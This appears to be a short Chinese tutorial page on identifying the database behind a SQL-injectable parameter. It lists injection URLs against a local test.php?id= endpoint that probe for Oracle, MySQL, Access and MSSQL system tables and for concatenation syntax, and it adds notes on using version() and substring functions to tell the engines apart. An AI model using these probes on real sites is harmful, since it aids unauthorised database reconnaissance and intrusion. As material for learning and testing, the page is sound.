时间:2021-07-01 10:21:17 帮助过:141人阅读
http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1
http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1
http://127.0.0.1/test.php?id=1 and (select count(*) from msysobjects)>0 and 1=1
http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1
http://127.0.0.1/test.php?id=1 and ‘1‘ + ‘1‘ = ‘11‘
http://127.0.0.1/test.php?id=1 and CONCAT(‘1‘,‘1‘)=‘11‘
http://127.0.0.1/test.php?id=1 and ‘1‘ + ‘1‘ = ‘11‘
http://127.0.0.1/test.php?id=1 and ‘1‘||‘1‘=‘11‘
http://127.0.0.1/test.php?id=1 and CONCAT(‘1‘,‘1‘)=‘11‘
mysql: @@version或是version()来返回当前的版本信息。
但无法判断是mysql还是mssql时,可以用version()函数来构造判断。
version()>1 返回与@@version>1 相同页面时,则可能是mysql。如果出现提示version()错误时,则可能是mssql。
在mssql中可以调用substring(), oracle则只可调用substr()
SQL注入判断数据库类型
标签:报错信息 数据库mysql version table 错误 acl objects 出现 数据